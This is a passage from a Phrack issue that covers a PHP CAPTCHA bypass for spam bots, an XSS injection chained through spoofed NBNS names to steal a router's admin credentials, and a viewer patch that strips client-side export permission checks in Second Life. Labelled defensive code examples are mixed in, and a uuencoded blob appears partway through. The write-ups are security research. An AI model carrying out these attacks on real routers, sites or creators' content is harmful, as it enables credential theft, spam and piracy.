                            mt_rand(0,$width),
                            mt_rand(0,$height),
                            1,
                            1,
                            $noise_color);
      }
      /* generate random lines in background */
      for( $i=0; $i<($width*$height)/150; $i++ ) {
         imageline($image,
                   mt_rand(0,$width),
                   mt_rand(0,$height),
                   mt_rand(0,$width),
                   mt_rand(0,$height),
                   $noise_color);
      }
      /* create textbox and add text */
      $textbox = imagettfbbox($font_size,
                              0,
                              $this->font,
                              $code)
      or die('Error in imagettfbbox function');
      $x = ($width - $textbox[4])/2;
      $y = ($height - $textbox[5])/2;
      imagettftext($image,
                   $font_size,
                   0,
                   $x,
                   $y,
                   $text_color,
                   $this->font ,
                   $code)
      or die('Error in imagettftext function');
      /* output captcha image to browser */
      header('Content-Type: image/jpeg');
      imagejpeg($image);
      imagedestroy($image);
      $_SESSION['security_code'] = $code;
   }

}

$width = isset($_GET['width']) && $_GET['width']<600?$_GET['width']:'120';
$height = isset($_GET['height'])&&$_GET['height']<200?$_GET['height']:'40';
$characters = isset($_GET['characters'])
&& $_GET['characters']>2?$_GET['characters']:'6';

$captcha = new CaptchaSecurityImages($width,$height,$characters);

?>
8<----------------------------------------------------------------------->8

The reason why this particular script was chosen was lost in the mists of
time so let's focus instead on the code:

----[ 1 - Oops

OK so darkangel was right, the script is *really* poorly designed:
    -> The set of possible characters is limited to 28 characters
    -> The characters are inserted in the image using imagettfbbox()
       with (amongst other things) a fixed $font_size, a predictable
       position, etc.
    -> The noise itself is generated using lines and circles of the
       same color ($noise_color) which makes it trivial to remove.

Ok so we knew that it was crappy but there is even more. darkjoker's
approach can be seen as a dictionary attack applied once the noise has
been removed. There is a much simpler way: since the characters are not
distorted, we can easily recover them using OCR software. Luckily there
exists a GNU one: gocr. We tested it against the imagettfbbox() function
and unsurprisingly ... it worked.

Hey man, it wasn't worth spending that much time :>

----[ 2 - Oops (bis)

We located two interesting things in the script and if you're a proficient
PHP reader then you've probably noticed them too... ;-)

    a) The number of characters inserted in the image is user controlled.
       If an attacker calls http://phrack.org/captcha.php?characters=x then
       he can generate a captcha with X characters ( x >= 2 ). This
       shouldn't be an issue in itself since captcha.php is called by the
       server. However it is because...

    b) The script includes an interesting line:
            $_SESSION['security_code'] = $code;
       This clearly means that the PHP session will only keep track of
       the *last* $code. While this is normal behavior (some captchas
       aren't readable at all so the user must be allowed to refresh),
       this will be to our advantage.

This gives us the opportunity to mount a new attack:
    -> I'm a spam bot and I'm writing some shit comment about how big &
       hard your penis will be when you will purchase my special pills. A
       PHP session is created.
    -> A captcha is loaded and because I'm a bot I can't fucking read it.
       Too bad for me.
    -> Within the same session I call captcha.php with ?characters=2.
       With a probability of 1/(28*28) I will be able to predict the
       code generated. I'll try as many times as required until I'm right.
    -> I will most likely succeed in the end and some poor desperate guy
       may purchase the pills.

We've changed the captcha mechanism, the old one being captcha_old.php
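
A Python model of the session logic from a) and b) in hardened form, as an
added example that is not part of the original article or of the quoted
script: the code length is fixed on the server, each stored code can be
checked only once, and wrong answers per session are capped. CaptchaSession,
MAX_FAILURES and the session model itself are assumptions for illustration.

```python
import hmac
import secrets

# Alphabet copied from generateCode() in the script quoted above: 28 symbols.
POSSIBLE = "23456789bcdfghjkmnpqrstvwxyz"
CODE_LENGTH = 6    # fixed on the server, never taken from the request
MAX_FAILURES = 5   # assumed limit on wrong answers per session


def code_space(length):
    """Number of equally likely codes for a given code length."""
    return len(POSSIBLE) ** length


class CaptchaSession:
    """Hypothetical stand-in for one visitor's server-side session state."""

    def __init__(self):
        self.code = None
        self.failures = 0

    def issue(self, query=None):
        """Start a new challenge.

        Request parameters are accepted but ignored, so a 'characters'
        value in the query string cannot shorten the code.
        """
        self.code = "".join(
            secrets.choice(POSSIBLE) for _ in range(CODE_LENGTH)
        )
        return self.code  # a real handler only renders this into an image

    def locked(self):
        """True once the session has used up its wrong answers."""
        return self.failures >= MAX_FAILURES

    def verify(self, answer):
        """Check an answer; every check consumes the stored code."""
        if self.code is None or self.locked():
            return False
        expected, self.code = self.code, None  # single use
        if hmac.compare_digest(expected.encode(), str(answer).encode()):
            return True
        self.failures += 1
        return False


if __name__ == "__main__":
    print("2-character code space:", code_space(2))
    print("6-character code space:", code_space(CODE_LENGTH))
    session = CaptchaSession()
    code = session.issue({"characters": "2"})  # parameter has no effect
    print("issued length:", len(code))
    print("first check:", session.verify(code))
    print("replay of same code:", session.verify(code))
```

Refreshing the image still works for unreadable captchas, since issue() can
be called again, but each refresh costs the guesser a full-length code.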

----[ 3 - Conclusion

Who knows if spammers are reading phrack? One thing is sure: the script is
very present on the Internet... Yes you should patch xD


|=[ 0x04 ]=---=[ XSS Using NBNS on a Home Router - Simon Weber ]=--------=|


--[ code is appended, but may not be the most recent. check:
    https://github.com/simon-weber/XSS-over-NBNS
    for the most recent version. ]--

--[ Contents

    1 - Abstract

    2 - Test Device Background

    3 - Injection Chaining Technique

    4 - Device Specific Exploits
     4.1 - Steal Router Admin Credentials
     4.2 - Hide a Device on the Network

    5 - Tool

    6 - Fix, Detection and Prevention

    7 - Applications

    8 - References


--[ 1 - Abstract

For routers which:

        1) use NBNS to identify attached devices
        2) list these devices on their web admin interface
        3) do not sanitize the names they receive

there exists a 15 character injection vector on the web interface. This
vector can be exploited by anyone on the network, and will affect anyone
who visits a specific page on the web administration interface. Using
multiple injections in sequence separated with block comments, it is
possible to chain these injections to create a payload of arbitrary length.
This can be used to gain router admin credentials, steal cookies from an
admin, alter the view of attached devices, or perform any other XSS attack.

The real world application of the technique is limited by how often admins
are on the web interface. However, coupled with some social engineering,
small businesses such as coffee shops may be vulnerable.

--[ 2 - Test Device Background

I got a Netgear wgr614 v5 for less than $15 shipped on eBay. This is a
common home wireless B/G router. Originally released in 2004, its EOL was
about 5 years ago [1].

The web admin interface is pretty poorly built (sorry, Netgear!). If you
poke around, you'll find a lot of unescaped input fields to play with.
However, none of them can really be used to do anything interesting -
they're one time injection vectors that other users won't see.

However, there is one interesting page. This is the "attached devices" page
(DEV_devices.htm). It shows a table of what's connected to the router, and
looks something like this:

        #  Name        IP              MAC
        1  computer_1  192.168.1.2     07:E0:17:8F:11:2F
        2  computer_2  192.168.1.11    AF:3C:07:4D:B0:3A
        3     --       192.168.1.15    EB:3C:76:0F:67:43

This table is generated from the routing table, and the name is filled in
from NBNS responses to router requests. If a machine doesn't respond to
NBNS, takes too long to respond, or it gives an invalid name (over 15
characters or improperly terminated), the name is set to "--". The table is
refreshed in two ways: automatically by the router at an interval, and by a
user visiting or refreshing the page.

A quick test showed that the name in this table was unescaped. However,
this only gets us 15 characters of payload. I couldn't manage to squeeze a
reference to external code in just 15 characters (maybe someone else can?).
Executing arbitrary code will require something a bit more sophisticated.

--[ 3 - Injection Chaining Technique

The obvious way to get more characters for the payload is by chaining
together multiple injections. To do this, we need a few things:

    1) A way to make multiple entries in the table:
        This is easy, we just send out fake responses for IP/MAC
        combinations that don't already exist on the network.

    2) A way to control the order of our entries:
        Also easy: the table orders by IP address. We'll just use a
        range of incremental addresses that no one else is using.

    3) A way to chain our entries around the other html:
        Block comments will work for this. Our injections will just open
        and close block comments at the end and beginning of their
        reported names. For an illustration, imagine anything between <>
        will be ignored on the page, and our name injections are
        delimited with single quotes:

                      '[name 1] <' [ignored stuff]
    [ignored stuff] '> [name 2] <' [ignored stuff]
           ...      '> [name 3] <'      ...

Great, that was easy. What kind of block comments can we use? How about
html's <!-- -->? This could work, but it has limitations. First off, -- or >
anywhere in the commented out html will break things. Even if this did
work, we'd have to be careful about where we split things, and the comments
would take up about half of a 15 char name.

Javascript's c-style block comments are smaller and more flexible. They can
come anywhere in code, so long as it isn't the middle of a token. For
example,

            document/* ignored */.write("something")

    is fine, while

            docu/* uh oh */ment.write("something")

    breaks things.

We also just need to avoid */ in the commented out html, which should be
much less likely to pop up than >. To use javascript block comments, we'll
obviously need to use javascript to get our payload onto the page. Call it
our "payload transporter". This will work just fine:

            "<script>document.write('[payload]');</script>"

So, then, the first thing to do is fit our transporter into 15 char chunks
to send as our first few fake NBNS names. Being careful not to split tokens
with comments, our first 3 names can be:

            <script>/*
            */document./*
            */write(/*

This will open the write command to inject our payload. Now we need to
package the payload into the transporter in some more 15 char chunks. Since
strings are tokens, we can't split one big string with block comments. We
need to split up the payload into multiple strings and introduce more
tokens between them. To do this, I leveraged the fact that document.write
can take multiple arguments, which it will write in order - the commas that
split parameters will be our extra tokens. String concatenation would work,
too. So, our payload will be packaged into the transporter like:

            'first part of payload', /*
            */ 'second part of payload', /*
            */ 'third part...', /*
                    ...
            */ ,'last part'); /*

It's easy to control the length of the strings to fit into the 15 char
length (we've just got to be careful about quotes in our payload). Lastly,
we just need to close the script tag, and we're done. We now have a way to
write an arbitrary length payload onto the attached devices page. Putting
it all together, here's an example of what our series of fake NBNS
responses could be if we wanted to get '<script>alert("test");</script>'
onto the page:

            Spoofed NBNS Name   IP               MAC
            <script>/*          192.168.1.111    00:00:00:00:00:01
            */document./*       192.168.1.112    00:00:00:00:00:02
            */write(/*          192.168.1.113    00:00:00:00:00:03
            */'<script>',/*     192.168.1.114    00:00:00:00:00:04
            */'alert(\'',/*     192.168.1.115    00:00:00:00:00:05
            */'test\');',/*     192.168.1.116    00:00:00:00:00:06
            */'</script',/*     192.168.1.117    00:00:00:00:00:07
            */'>');/*           192.168.1.118    00:00:00:00:00:08
            */</script>         192.168.1.119    00:00:00:00:00:09

There are a few other practical considerations that I found while working
with my specific Netgear router. It will use the most recent information it
has for device names. This means that we have to send our payload every
time that requests are sent out. It also means that for some time after we
stop injecting, the device listing is going to have a number of '--'
entries; the router is expecting to get names for these devices but sees no
response. To hide our tracks, we could reboot the router when finished
(this is possible by either injection or after stealing admin credentials,
which is detailed below).

We also have to be careful that a legitimate device doesn't come on to the
network with one of our spoofed IPs or MACs. This could possibly break our
injection, depending on the timing of responses.

One last thing to keep in mind: the NBNS packets need to get on the wire
quickly, since the router only listens for NBNS responses for a short time.
Thus, smaller payloads (which fit into fewer packets) are more likely to
succeed. You'll want to create external javascript to do any heavy lifting,
and just inject code to run it. When a payload fails, earlier packets will
get there and others won't, leaving garbage in the attached devices list.

--[ 4 - Device Specific Exploits

Naturally, anything that can be done with XSS or javascript is fair game.
You can attack the user (cookie stealing), the router (injected requests to
the web interface are now authed), or the page itself. I created a few
interesting examples that are specific to the Netgear device I had.

------[ 4.1 - Steal Router Admin Credentials

On the admin interface, there is an option to backup and restore the router
settings. It generates a simple flat file database called netgear.cfg. This
file itself is actually rather interesting. It seems to be a plaintext
memory dump, guarded from manipulation by a checksum that I couldn't figure
out (no one has cracked it as of the time this was written - if you do, let
me know). In it, you'll find everything from wireless keys to static routes
to - surprise - plaintext administrator information. This includes
usernames and passwords for both the http admin and telnet super admin (see
[3] for information on the hidden telnet console).

It's easy to steal this file via XSS in the same way that cookies are
stolen. The attacker first sets up a listening http server to receive the
information. Then, the injection code simply GETs the file and sends it off
to the listening server.

With admin access to the router, the attacker can do all sorts of things.
Basic traffic logging is built-in, and can even be emailed out
automatically. DoS is possible through the router's website blocking
functions. Man in the middle attacks are possible through the exposed dhcp
dns, static routing and internet connection configuration options.

------[ 4.2 - Hide a Device on the Network

The only place that an admin can get information about who is on the
network is right on the page we inject to. Manipulating the way the device
list is displayed could provide simple counter-detection against a
suspicious administrator.

For this exploit, we inject javascript to iterate through the table and
remove any row that matches a device we're interested in. Then, the table
is renumbered. Note that we don't have to own the device to remove it from
the list.

Going one step further, the attacker can bolster the cloak of invisibility.
Blocking connections not originating from the router is an obvious choice.
It might be wise to block pings directly from the router as well.

--[ 5 - Tool

I used Scapy with Python to implement the technique and exploits described
above and hosted it on Github [2]. You can also specify a custom exploit
that will be packaged and sent using my chaining technique. I also made a
simple python http server to listen for stolen admin credentials and serve
up external exploit code. Credit goes to Robert Wesley McGrew for NBNSpoof;
I reused some of his code [4].

To combat the problem I described earlier about sending packets quickly, I
listen for the first request from the router and precompute the response
packets to send. These will be sent as responses to any other requests
sniffed. You'll notice this if you use my tool; a "ready to inject" message
will be printed after the responses are generated.

If you look at my built-in exploits, you'll see they each use a loadhelp2
function as the entry point. This is just an easy way to get them to run
when the page is loaded. The router declares the loadhelp function
externally, and runs it on page load; I declare it on the page (so my
version is actually used), and use it to launch my external loadhelp2 code.
Then, the original code is patched on to the end, so the user doesn't
notice.

--[ 6 - Fix, Detection and Prevention

To close the hole, Netgear would only need to change some web backend code
in the firmware to escape NBNS names. I contacted Netgear about this. They
won't make a fix for this specific model - it already saw its support EOL -
but they are checking their newer models for this flaw as of September 2011
[1].

So, if you have this router, know that a fix isn't coming. While it may be
difficult to initially detect that a device you own is being attacked, once
you suspect it there are simple ways to verify it:

        check the source of the affected page; you'll see the commented
        out device entries with suspicious names

        use the hidden telnet interface. This will show the many fake
        IPs that are generated when packing a payload.

        as a last resort, watch network traffic for malformed NBNS names

Also, keep in mind that you can only be affected when checking your
router's configuration. You could protect yourself completely by never
visiting the web administration interface.
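
The backend fix and the name check from this section, applied to the sample
rows from sections 2 and 3, as an added Python example that is not part of
the author's tool or the router firmware. It assumes names, IPs and MACs
have already been collected (from the page source or a sniffer);
render_row, flag_names and chained_runs are hypothetical helpers.

```python
import html
import ipaddress
import re

# Host names never need markup characters or JavaScript comment delimiters.
SUSPICIOUS = re.compile(r"[<>'\"();]|/\*|\*/")
MAX_NAME_LEN = 15  # name length limit stated in the article

# Constructed sample: the three ordinary rows from section 2 followed by
# the spoofed rows from the table in section 3.
OBSERVED = [
    ("computer_1", "192.168.1.2", "07:E0:17:8F:11:2F"),
    ("computer_2", "192.168.1.11", "AF:3C:07:4D:B0:3A"),
    ("--", "192.168.1.15", "EB:3C:76:0F:67:43"),
    ("<script>/*", "192.168.1.111", "00:00:00:00:00:01"),
    ("*/document./*", "192.168.1.112", "00:00:00:00:00:02"),
    ("*/write(/*", "192.168.1.113", "00:00:00:00:00:03"),
    ("*/'<script>',/*", "192.168.1.114", "00:00:00:00:00:04"),
    (r"*/'alert(\'',/*", "192.168.1.115", "00:00:00:00:00:05"),
    (r"*/'test\');',/*", "192.168.1.116", "00:00:00:00:00:06"),
    ("*/'</script',/*", "192.168.1.117", "00:00:00:00:00:07"),
    ("*/'>');/*", "192.168.1.118", "00:00:00:00:00:08"),
    ("*/</script>", "192.168.1.119", "00:00:00:00:00:09"),
]


def render_row(index, name, ip, mac):
    """Backend fix: escape every field before it reaches the HTML table."""
    cells = (str(index), name, ip, mac)
    return "<tr>" + "".join(
        "<td>%s</td>" % html.escape(cell, quote=True) for cell in cells
    ) + "</tr>"


def render_table(observed):
    """Render the attached-devices table with all names escaped."""
    rows = [render_row(i, *row) for i, row in enumerate(observed, 1)]
    return "<table>" + "".join(rows) + "</table>"


def flag_names(observed):
    """Return rows whose name is over-long or carries markup/comment syntax."""
    return [
        row for row in observed
        if len(row[0]) > MAX_NAME_LEN or SUSPICIOUS.search(row[0])
    ]


def _ip_key(row):
    return int(ipaddress.ip_address(row[1]))


def chained_runs(observed, min_len=3):
    """Group flagged rows on consecutive IPs.

    Chaining depends on the table being ordered by IP address, so a run of
    flagged names on adjacent addresses is a much stronger signal than a
    single odd name.
    """
    runs, current = [], []
    for row in sorted(flag_names(observed), key=_ip_key):
        if current and _ip_key(row) == _ip_key(current[-1]) + 1:
            current.append(row)
        else:
            if len(current) >= min_len:
                runs.append(current)
            current = [row]
    if len(current) >= min_len:
        runs.append(current)
    return runs


if __name__ == "__main__":
    for run in chained_runs(OBSERVED):
        print("suspicious run: %s to %s (%d names)"
              % (run[0][1], run[-1][1], len(run)))
    print(render_row(4, *OBSERVED[3]))
```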

--[ 7 - Applications

Of course, this technique's practical application is limited to how often
users check their router admin pages. However, when coupled with some
social engineering, I could imagine a vulnerability for small businesses
like coffee shops.

These locations commonly offer wireless using off-the-shelf hardware like
my Netgear router. Getting on their network is easy - it's already open. At
this point, the attacker starts the exploit, then convinces an employee to
check the admin pages (maybe "I'm having some strange issues with the
wireless...Can you check on the router and see if my device is showing
up?"). I'm sure a practiced social engineer would have no trouble pulling
this off.

As far as applying this beyond the home networking realm, a good place to
start would be investigating this technique on other routers or better
firmwares like DD-WRT or Tomato. That would at least determine if this is a
common flaw. I didn't have another device to play with (the wgr614v5
doesn't work with other firmware), so I'll leave it for someone else to
try.

I'm doubtful that other applications very different from what I described
exist. Router administration pages simply aren't viewed very much. However,
the broader idea of XSS through spoofed NBNS names might be applicable to a
different domain. Anywhere there is a listing of NBNS names, there is the
possibility of an injection vector.

--[ 8 - References

[1]  private communication with Netgear, September 2011
[2]  https://github.com/simon-weber/XSS-over-NBNS
[3]  http://www.seattlewireless.net/NetgearWGR614#TelnetConsole
[4]  http://www.mcgrewsecurity.com/tools/nbnspoof/


                                           October 2011
                                           Simon Weber
                                           sweb090 _at_ gmail.com


M,S@C&<9XU!:6M22))V/&N?H]5)$'-28J4&T6L/M[QM5VIP(S/@.3N@%:5XC]
MQG.\\)#/A`$;3N;I.*9#TO2323BYF?J"*K3AMNCU#N\AJ&%['LP)F4V*\0UE
MNH^%0:6VN7"2R#IJNM;9<)(.KT)]D*NGHB5:`&MKCB`[DOTKBP"G"_N&8!>D
MMU_AJ&$C3.#`O."=MCI><TVNL?$\XQ5=DH3)O?:7]VU`5?[;T>_G&6.3_.]V
MNE7Y#\]._K\$@'BVE_SA?)(WK`]@B%[J`V(VRA/`\0WYO.BA/=!2Y'_[4)^D
M2IH;;BZ=R2-3'$1<'V\',#Z:I0N\2985PWPY2E6`*-`LKS"S3,EN&7@,/<SR
MOX!T)#<W2'6NK@(@V;KD6I/YD>&<5'J9<([/%G8W/6"+^6:O%DNIJ*?M6`P"
M8@OPY<<<]B[H$K!\:H8HI$!S`MX!)>B9BZ)S]$9=JC*=7&PK<A8%E`M(3-2,
MT3020:(Y^JP-;M`(J.#0WH#)QC@/;(3S+)M1Q"_&NDWLY^>S4_A/E30R^!'.
MKM."^T@$3)C&1!&G=C,U@?DK#Y-PROM]PZV/^3@;G=[F$JS!)XZ`WY)3E$=B
M8]]"9+(A)53768QF=BI&7*`4JV>S&S>2O=]NI_FIY-XRSR4OC!\?9*EL([C*
M_)/CDJNBA$*E&1%&8Z@W4I=0#50JSG?04)QJX<"!`P<.'#APX,"!`P<.'#AP
2X,"!`P<.7A_^`BMJX<X`>```
`
end


|=[ 0x05 ]=---=[ Hacking the Second Life Viewer For Fun & Profit - Eva ]-=|

|=-----------------------------------------------------------------------=|
|=------------------------=[ 01110010011000010110 ]=---------------------=|
|=------------------------=[ 01100110010101101110 ]=---------------------=|
|=------------------------=[ 10010110111001110011 ]=---------------------=|
|=------------------------=[ 01110011011001010111 ]=---------------------=|
|=-----------------------------------------------------------------------=|

Index

------[ N. Preamble
------[ I. Part I - Objects
------[ II. Part II - Textures
            II. i. Textures - GLIntercept
------[ III. Postamble
------[ B. Bibliography
------[ A. Appendix

|=-----------------------------------------------------------------------=|

------[ N. Preamble

Second Life [1] is a virtual universe created by Linden Labs [2] which
allows custom content to be created by uploading different file formats. It
secures that content with a permission mask "Modify / Copy / Transfer",
which allows creators to protect their objects from being modified, copied
or transferred from avatar to avatar. The standard viewer at the time of
this writing is 2.x but the 1.x old codebase is still around and it is
still the most wide-spread one. Then, we have third party viewers, and
those are viewers forked off the 1.x codebase and then "extended" to modify
the UI and add features for convenience.

Second Life works on the principle of separately isolated servers called
SIMs (from "simulator", recently renamed to "Regions") which are
interconnected to form grids. The reasoning is that, if one SIM goes down,
it will become unavailable but it will not take down the entire grid. A
grid is just a collection of individual SIMs (regions) bunched together.

Avatars are players that connect to the grid using a viewer and navigate
the SIMs by "teleporting" from one SIM to the other. Technically, that
just means that the viewer is instructed to connect to the address of a
different SIM.

A viewer is really just a Linden version of a web browser (literally) which
relies on loads of Open Source software to run. It renders the textures
around you by transferring them from an asset server. The asset server is
just a container that stores all the content users upload onto Second Life.
Whenever you connect to a SIM, all the content around you gets transferred
to your viewer, just like surfing a website.

There are a few content types in Second Life that can be uploaded by users:

  1.) Images
  2.) Sounds
  3.) Animations

Whenever I talk about "textures", I am talking about the images that users
have uploaded onto Second Life. In order to upload one of them onto Second
Life, you have to pay 10 Linden dollars. Linden maintains a currency
exchange from Linden dollars to real dollars.

At any point, depending on the build permission of the SIM you are
currently on, you are able to create objects. Those are just basic
geometric shapes called primitives (or prims for short), such as cubes,
spheres, prisms, etc... After you have created a primitive, you can
decorate it with images or use the Linden Scripting Language LSL [3] to
trigger the sounds you uploaded or animate avatars like yourself. There is
a lot to say about LSL, but it exceeds the scope of the article. You can
also link several such primitives together to form a link set which, in
turn, is called an object. (LISP fans dig in, Second Life is all about
lists - everything is a list.)

Coming back to avatars, your avatar has so called attachment-points which
allow you to attach such an object to yourself. Users create content, such
as hats, skirts, and so on and they sell them to you and you attach them to
these attachment points.

In addition to that, there are such things called wearables. Those are
different from attachments because they are not made up of objects but they
are rather simple textures that you apply to yourself. Those do not have
any geometric properties in-world and function on the principle of layers,
hiding the layer underneath. Finally, you have body parts which are also
just textures. For example, eyes, your skin.

The wearable layers get superimposed (baked) on you. For example, if you
wear a skin and a T-shirt, the T-shirt texture will hide part of the skin
texture underneath it.

We are going to take a standard viewer: we will use the Imprudence [4]
viewer, the current git version of which has such an export feature and we
are going to modify it so it will allow exports of any in-world object.
Later on, the usage of GLIntercept [7] will be mentioned since it can be
used to export the wearables and the body parts mentioned which are just
textures.

Why does this work? There are a number of restrictions which are enforced
by the server, and a number of actions that the server cannot control. For
example, every action you trigger in Second Life usually gets a permission
check with the SIM you are triggering the action on. Your viewer interprets
the response from the SIM and if it is given the green light, your viewer
goes ahead and performs the action you requested.

Say, for example, that the viewer does not care whether the SIM approves it
or not and just goes ahead and does it anyway. Will that work? It depends
whether the SIM checks again. Some viewers have a feature called "Enable
always fly.", which allows you to fly around in no-fly zones which is an
instance of the problem. The SIM hints the viewer that it is a no-fly zone,
however the viewer ignores it and allows you to fly regardless.

Every avatar is independent in this aspect and protected from other avatars
by a liability dumping prompt. Whenever an avatar wants to interact with
you, you are prompted to allow them permission to do so. However, the
graphics are always displayed and your viewer renders other avatars without
any checks. One annoyance, for example, is to spam particles generated by
LSL. Given a sufficiently slow computer, your viewer will end up
overwhelmed and crash eventually. These days, good luck with that...

But how do we export stuff we do not own, doesn't the server check for
permissions? Not really, we are not going to "take" the object in the sense
of violating the Second Life permissions. We are going to scan the object
and note down all the parameters that the viewer can see. We are then going
to store that in an XML file along with the textures as well. This will be
done automatically using Imprudence's "Export..." feature.

Whenever you upload any of the content types mentioned in the previous
chapter, the Linden asset server generates an asset ID which is basically
a UUID that references the content you uploaded. The asset server
(conveniently for us) does not carry out any checks to see whether there is
a link between an object referencing that UUID and the original uploader.
Spelled out, if you manage to grab the UUID of an asset, you can reference
it from an object you create.

For example, if a user has uploaded a texture and I manage to grab the UUID
of the texture generated by the asset server, then I can use LSL to display
it on the surface of a primitive. It is basically just security through
obscurity (and bugs)...
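
The trust boundary described above, as an added example (not code from the
article, Linden or Imprudence): a constructed C++ model of an asset server
that either accepts a bare UUID plus the viewer's own verdict, or decides
from its own records of who holds what. AssetServer, Request,
client_validated and the sample IDs are all assumptions made for the
illustration.

```cpp
// Added illustration: a hypothetical server-side model, not Linden or
// Imprudence code. Every identifier and sample ID here is constructed.
#include <cstdint>
#include <iostream>
#include <map>
#include <string>

using Id = std::string;  // stands in for an agent or asset UUID

const std::uint32_t PERM_MODIFY   = 1u << 0;
const std::uint32_t PERM_COPY     = 1u << 1;
const std::uint32_t PERM_TRANSFER = 1u << 2;
const std::uint32_t PERM_FULL = PERM_MODIFY | PERM_COPY | PERM_TRANSFER;

struct Asset {
    Id creator;                           // uploader, recorded at upload
    std::string data;
    std::map<Id, std::uint32_t> holders;  // agent -> mask on the copy they own
};

// What a viewer sends. client_validated stands for the verdict of a
// viewer-side check; a modified viewer can always send true.
struct Request {
    Id asset_id;
    bool client_validated;
};

class AssetServer {
public:
    void upload(const Id& asset_id, const Id& creator, const std::string& data) {
        Asset a;
        a.creator = creator;
        a.data = data;
        a.holders[creator] = PERM_FULL;
        assets_[asset_id] = a;
    }

    // Record that `to` now owns a copy with the given Modify/Copy/Transfer mask.
    void give(const Id& asset_id, const Id& to, std::uint32_t mask) {
        std::map<Id, Asset>::iterator it = assets_.find(asset_id);
        if (it != assets_.end()) it->second.holders[to] = mask;
    }

    // Weak: the UUID acts as the only credential and the viewer's own
    // verdict is believed. No link to the requesting agent is checked.
    bool referenceTrustingClient(const Request& r) const {
        return assets_.count(r.asset_id) != 0 && r.client_validated;
    }

    // Hardened: decided from server records and the authenticated session
    // agent only. r.client_validated is deliberately never read.
    bool mayReference(const Id& session_agent, const Request& r) const {
        const Asset* a = find(r.asset_id);
        return a != 0 && a->holders.count(session_agent) != 0;
    }

    // Hardened export: creator and owner with an unrestricted mask,
    // evaluated on the server, where a viewer patch cannot reach it.
    bool exportAsset(const Id& session_agent, const Request& r,
                     std::string& out) const {
        const Asset* a = find(r.asset_id);
        if (a == 0 || a->creator != session_agent) return false;
        std::map<Id, std::uint32_t>::const_iterator h =
            a->holders.find(session_agent);
        if (h == a->holders.end()) return false;
        if ((h->second & PERM_FULL) != PERM_FULL) return false;
        out = a->data;
        return true;
    }

private:
    const Asset* find(const Id& id) const {
        std::map<Id, Asset>::const_iterator it = assets_.find(id);
        return it == assets_.end() ? 0 : &it->second;
    }
    std::map<Id, Asset> assets_;
};

int main() {
    AssetServer server;
    server.upload("asset-0001", "creator-A", "texture-bytes");  // constructed
    server.give("asset-0001", "buyer-B", PERM_COPY);

    Request forged = {"asset-0001", true};  // viewer claims its check passed
    std::string out;
    std::cout << "trusting client:      "
              << server.referenceTrustingClient(forged) << "\n"
              << "stranger-C reference: "
              << server.mayReference("stranger-C", forged) << "\n"
              << "buyer-B reference:    "
              << server.mayReference("buyer-B", forged) << "\n"
              << "buyer-B export:       "
              << server.exportAsset("buyer-B", forged, out) << "\n"
              << "creator-A export:     "
              << server.exportAsset("creator-A", forged, out) << "\n";
    return 0;
}
```

Binding references to server-side records stops a captured UUID from being
reused inside the grid; it cannot stop capture of data the viewer must
receive in order to render it.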

------[ I. Part I - Objects

The "Export..." feature on the viewers we attack is not an official feature
but rather a feature implemented by the developers of the viewers
themselves. That generally means that the viewer only implements certain
checks at the client level without them being enforced by the server. The
"Export..." feature is just a dumb feature which scans the object's
measurements, grabs the textures and dumps the data to an XML file and
stores image files separately.

Since it is a client-side check, we can go ahead and download Imprudence
(the same approach would work on the Phoenix [5] client too) and knock out
all these viewer checks.

After you have cloned the Imprudence viewer from the git repo, the first
file we edit is at linden/indra/newview/primbackup.cpp.

Along the very first lines there is a routine that sets the default
textures. I do not think this is needed to make our "Export..." work, but
it is a good introduction to what is going on in this article:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
void setDefaultTextures()
{
    if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
    {
        // When not in SL (no texture perm check needed), we can
        // get these defaults from the user settings...
        LL_TEXTURE_PLYWOOD =
            LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
        LL_TEXTURE_BLANK =
            LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
        if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
        {
            // This control only exists in the
            // AllowInvisibleTextureInPicker patch
            LL_TEXTURE_INVISIBLE =
                LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
        }
    }
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The viewer uses a method isSecondLife() to check if it is currently on the
official grid. Depending on the outcome of this method, the viewer
internally takes decisions on whether certain things are allowed so that
the viewer will conform to the Linden third-party viewer (TPV) policy [6].
The TPV policy is a set of rules that the creator of a viewer has to
respect so that the viewer will be granted access to the Second Life grid
(ye shall not steal, ye shall not spam, etc...).

However, these checks are client-side only. They are used internally within
the viewer and they have nothing to do with the Linden servers. What we do,
is knock them out so that the viewer does not perform the check to see if
it is on the official grid. In this particular case, we can knock out the
check easily by eliminating the if-clause, like so:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
void setDefaultTextures()
{
    //if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
    //{
          // When not in SL (no texture perm check needed), we can
          // get these defaults from the user settings...
          LL_TEXTURE_PLYWOOD =
              LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
          LL_TEXTURE_BLANK =
              LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
          if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
          {
              // This control only exists in the
              // AllowInvisibleTextureInPicker patch
              LL_TEXTURE_INVISIBLE =
                  LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
          }
    //}
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Without this check, the viewer assumes that we are on any grid but the
Second Life grid. You probably can notice that these checks are completely
boilerplate.

Let us move on to the next stop. Somewhere in
linden/indra/newview/primbackup.cpp you will find the following:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
{
    if(gHippoGridManager->getConnectedGrid()->isSecondLife())
    {
        // In Second Life, you must be the creator to be permitted to
        // export the asset.
        return (gAgent.getID() == item_permissions->getOwner() &&
            gAgent.getID() == item_permissions->getCreator() &&
            (PERM_ITEM_UNRESTRICTED & item_permissions->getMaskOwner())
            == PERM_ITEM_UNRESTRICTED);
    }
    else
    {
        // Out of Second Life, simply check that you're the owner and the
        // asset is full perms.
        return (gAgent.getID() == item_permissions->getOwner() &&
            (item_permissions->getMaskOwner() & PERM_ITEM_UNRESTRICTED)
            == PERM_ITEM_UNRESTRICTED);
    }
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

